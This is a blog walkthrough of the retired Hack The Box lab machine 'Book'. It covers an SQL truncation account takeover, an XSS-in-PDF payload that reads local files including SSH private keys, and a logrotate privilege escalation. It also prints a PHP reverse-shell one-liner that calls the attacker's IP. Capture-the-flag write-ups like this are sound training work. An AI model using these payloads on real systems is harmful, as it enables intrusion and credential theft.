Hack the box - Book Write up

Derick Neriamparambil
6 min readJul 11, 2020

--

Book is a hard Linux machine in Hack the box which got retired very recently.

If you don't know what hack the box is, it is an online platform that enables us to develop our skills in pentesting through live machines and other challenges.

Take a tour:

This is my first write-up on a HTB machine.

Lets Start...

As usual, I started with nmap scan

Parallel to that task, I also initiated a directory search with the dirsearch tool.

Form the initial enumeration, I found that port 80 is open.

We have option to sign up and sign in. Initially, I tried with some basic SQL injection, but nothing happened. So I just signed up and did a stroll through the website. I was able to see a book submission portal with a file upload. I tried uploading some payloads through that but nothing worked.

I was sure that the book submission portal has something important to do with the box. But nothing was happening here also.

When I was inspecting the page source of 10.10.10.176/index, I found something interesting.

Yeah!! that's my ticket

Here, the size should not be greater than 20 characters. So if I give an email address with 21 characters, I can set a new password for any user and signup. You can read more about this attack from below link

I used Burp Suite to capture the request and alter the email address to 21characters long one.

In the above image at line 16, after the email address, I have added a few spaces followed by “z” which makes it a total of 21 characters.

Once this account creation is successful, I can log in with

email: admin@book.htb

Pass: admin -> which I recently set

I logged as admin via http://10.10.10.176/admin which I got from directory search.

After navigating through the admin page, I found a few pdf under users and collection

After some research, I found the below attack which is very useful and decided to try it.

From the user account’s book submission portal I added the below script and uploaded a dummy text file along with it

<script>x=new XMLHttpRequest;x.onload=function(){document.write(this.responseText)};x.open(“GET”,”file:///etc/passwd”);x.send();</script>

After checking the ‘collections’ PDF from the admin account, I found the below PDF.

Yes, it's working!!

we found a user named reader

Then I decided to give a try to extract the RSA key using the same method.

By default, ssh key will be available at /home/.ssh/id_rsa. I edited the script and again send the request through the user profile

<script>x=new XMLHttpRequest;x.onload=function(){document.write(this.responseText)};x.open(“GET”,”file:///home/.ssh/id_rsa”);x.send();</script>

I used the below-mentioned python tool to extract the key from PDF file.

sudo python3 pdf2txt.py -o readerkey /home/d3r1c/HTB/Book/28942.pdf

we will get the private key of reader

I copied the ssh key to a file id_rsa. After setting up permission using chmod, I tried accessing the reader through SSH

ssh -i id_rsa reader@10.10.10.176

we own the user!

Now, its time to find a way to escalate the privilege.

Here, I used a tool named “pspy” which is used for unprivileged Linux process inquiry. You can install and read this about in below link

using simpleHttpsServer with python, I downloaded pspy to the target machine and enabled it with executable permission.

By checking the logs from this, I found logrotate is running

logrotate is designed to ease administration of systems that generate large numbers of log files. It allows automatic rotation, compression, removal, and mailing of log files. Each log file may be handled daily, weekly, monthly, or when it grows too large.

From Github, I found an exploit for logrotate

I copied the entire code into logrotten.c and enables execution permission with “chmod 700 logrotten.c”

gcc -o logrotten logrotten.c

the binary will be stored as logrotten

After that I created a payload file with a PHP reverse shell in

php -r ‘$sock=fsockopen(“10.10.14.195”,1234);exec(“/bin/sh -i <&3 >&3 2>&3”);’

After that, I executed the logrotten binary with payload

./logrotten -p ./payload /home/reader/backups/access.log

A netcat session was also arranged to capture the reverse shell on my Linux(10.10.14.195) at port 1234

Once I got the reverse shell, which was not persistent, I ran the below command.

PS: Here I missed the reverse shell twice. So the third time I was ready with “cat” command

cat /root/.ssh/id_rsa

Once I got this, I made a new file named book_id_rsa and copied the RSA key into it and tried to gain as root using

ssh -i book_id_rsa root@10.10.10.176

We got the root!

Just let me know if you have any doubts

If you found this write-up useful, you can respect me on HTB

https://www.hackthebox.eu/home/users/profile/240146

You can connect me on

LinkedIn: Derick N

Twitter: Derick N

--

--